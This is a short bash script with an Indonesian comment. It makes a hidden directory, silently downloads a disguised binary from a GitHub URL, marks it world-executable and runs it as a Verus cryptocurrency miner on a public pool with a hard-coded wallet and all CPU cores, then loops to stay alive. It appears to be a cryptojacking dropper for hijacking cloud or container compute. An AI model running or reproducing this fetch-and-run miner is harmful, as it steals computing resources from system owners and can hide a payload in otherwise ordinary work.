#!/bin/bash
mkdir -p .kap && cd .kap
wget -O bubux https://github.com/Dewinet/your/raw/refs/heads/main/bct >/dev/null 2>&1
chmod 777 bubux
./bubux -a verus -o stratum+tcp://eu.luckpool.net:3956 -u RFAj8CZ7FcnxoJpQr2wrgEyLGYuhebFaPT.nokia -t $(nproc --all)

# Gunakan loop agar proses tetap berjalan di foreground
while true; do sleep 999; done
